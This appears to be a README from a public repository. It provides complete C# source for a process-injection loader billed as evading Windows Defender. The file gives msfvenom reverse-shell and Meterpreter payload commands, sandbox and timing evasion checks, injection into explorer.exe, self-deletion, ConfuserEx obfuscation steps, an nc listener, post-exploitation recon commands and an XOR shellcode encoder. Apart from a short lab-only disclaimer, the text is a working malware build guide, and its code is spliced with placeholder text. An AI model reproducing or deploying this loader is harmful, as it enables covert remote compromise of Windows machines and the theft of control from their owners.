For authorized lab use only.
Running these techniques on systems you do not own or without permission is illegal.
This repository is provided “as is”, without warranty of any kind. The author assumes no liability for any misuse. By using any part of this code you agree to comply with all applicable laws and gain explicit permission before running it against a system.
Note
The C# injector Working Undetected From Windows Defender
Last Checked: 19.Mai.2025
The C# injector Code is Public Here So i Expect it to be patched soon by someone posting this on virustotal and giving the string away so i recommend reconstructing the C# code to your own.
- Visual Studio 2022 (with .NET Framework support)
- ConfuserEx (download here)
- Kali Linux (for
msfvenompayload generation) - Basic knowledge of C# and command-line tools.
Choose which line you want to create the payload you can test all 3:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=eth0 LPORT=443 EXITFUNC=thread --encrypt xor --encrypt-key j
msfvenom -p windows/x64/shell_reverse_tcp LHOST=eth0 LPORT=443 EXITFUNC=thread -f csharp --encrypt xor --encrypt-key j
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=eth0 LPORT=443 EXITFUNC=thread -f csharp
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.Linq;
using System.Runtime.InteropServices;
using System.Text;
using System.Threading.Tasks;
namespace inject
{
internal class Program
{
[DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
static extern IntPtr OpenProcess(uint processAccess, bool bInheritHandle, int processId);
[DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll")]
static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, Int32 nSize, out IntPtr lpNumberOfBytesWritten);
[DllImport("kernel32.dll")]
static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
[DllImport("kernel32.dll")]
static extern void Sleep(uint dwMilliseconds);
[DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
static extern IntPtr VirtualAllocExNuma(IntPtr hProcess, IntPtr lpAddress, uint dwSize, UInt32 flAllocationType, UInt32 flProtect, UInt32 nndPreferred);
[DllImport("kernel32.dll")]
static extern IntPtr GetCurrentProcess();
[DllImport("kernel32.dll", SetLastError = true)]
static extern IntPtr FlsAlloc(IntPtr callback);
static void Main(string[] args)
{
// Check if we're in a sandbox by calling a rare-emulated API
if (VirtualAllocExNuma(GetCurrentProcess(), IntPtr.Zero, 0x1000, 0x3000, 0x4, 0) == IntPtr.Zero)
{
return;
}
IntPtr ptrCheck = FlsAlloc(IntPtr.Zero);
if (ptrCheck == null)
{
return;
}
// uncomment the following code if the sand box has internet
//string exename = "Injector+heuristics";
//if (Path.GetFileNameWithoutExtension(Environment.GetCommandLineArgs()[0]) != exename)
//{
// return;
//}
//if (Environment.MachineName != "EC2AMAZ-CRPLELS")
//{
// return;
//}
//try
//{
// HttpWebRequest req = (HttpWebRequest)WebRequest.Create("http://bossjdjiwn.com/");
// HttpWebResponse res = (HttpWebResponse)req.GetResponse();
//
// if (res.StatusCode == HttpStatusCode.OK)
// {
// return;
// }
//}
//catch (WebException we)
//{
// Console.WriteLine("\r\nWebException Raised. The following error occured : {0}", we.Status);
//}
// Sleep to evade in-memory scan + check if the emulator did not fast-forward through the sleep instruction
var rand = new Random();
uint dream = (uint)rand.Next(10000, 20000);
double delta = dream / 1000 - 0.5;
DateTime before = DateTime.Now;
Sleep(dream);
if (DateTime.Now.Subtract(before).TotalSeconds < delta)
{
Console.WriteLine("Joker, get the rifle out. We're being fucked.");
return;
}
Process[] pList = Process.GetProcessesByName("explorer");
if (pList.Length == 0)
{
// Console.WriteLine("[-] No such process!");
System.Environment.Exit(1);
}
int processId = pList[0].Id;
// 0x001F0FFF = PROCESS_ALL_ACCESS
IntPtr hProcess = OpenProcess(0x001F0FFF, false, processId);
IntPtr addr = VirtualAllocEx(hProcess, IntPtr.Zero, 0x1000, 0x3000, 0x40);
By zebbern SHELLCODE PAYLOAD HERE CHOOSE FROM ABOVE THIS TEXT PUT IT IN KALI PASTE THE SCRIPT
// XOR-decrypt the shellcode
for (int i = 0; i < buf.Length; i++)
{
buf[i] = (byte)(buf[i] ^ (byte)'j');
}
IntPtr outSize;
WriteProcessMemory(hProcess, addr, buf, buf.Length, out outSize);
IntPtr hThread = CreateRemoteThread(hProcess, IntPtr.Zero, 0, addr, IntPtr.Zero, 0, IntPtr.Zero);
// Launch a separate process to delete the executable
string currentExecutablePath = Process.GetCurrentProcess().MainModule.FileName;
Process.Start(new ProcessStartInfo()
{
Arguments = "/C choice /C Y /N /D Y /T 3 & Del \"" + currentExecutablePath + "\"",
WindowStyle = ProcessWindowStyle.Hidden,
CreateNoWindow = true,
FileName = "cmd.exe"
});
}
}
}By zebbern SHELLCODE PAYLOAD HERE CHOOSE FROM ABOVE THIS TEXT PUT IT IN KALI PASTE THE SCRIPT
byte[] buf = new byte[460] {0x96,0x22 etc...............0xbf};
- Project → Properties → Application → Output Type → Windows Application
- Re‑build (Release | x64).
- Drag the fresh
.exeinto ConfuserEx - Preset = Normal → add ~10 random protections → Protect
- The obfuscated binary appears in
/Confused/.
Add these in a random order it should be 10
- Listener (attacker):
rlwrap -cAr nc -lvnp 443
- Target: double‑click the obfuscated payload.
- Success → a shell or Meterpreter session connects back.
Tip: use a high‑numbered port (e.g. 443, 8443) that the firewall allows.
)
whoami
systeminfo
ipconfig /all
net users
net localgroup administrators
| Issue | Fix |
|---|---|
| Payload deleted on save | Verify EXE is obfuscated and shell‑code is XOR‑encoded |
| No callback | Check IP/LPORT, outbound firewall, AV quarantine |
| Program exits instantly | Sandbox/timing checks triggered – comment them for lab use |
| ConfuserEx “resource not found” | Make sure you built **Release |
# Encode sc.bin with key 0x6A
[byte[]]$sc = Get-Content sc.bin -Encoding Byte
$key = 0x6A
$enc = $sc | ForEach-Object { $_ -bxor $key }
[System.IO.File]::WriteAllBytes('sc_xor.bin', $enc)Happy (legal) hacking! 🛡️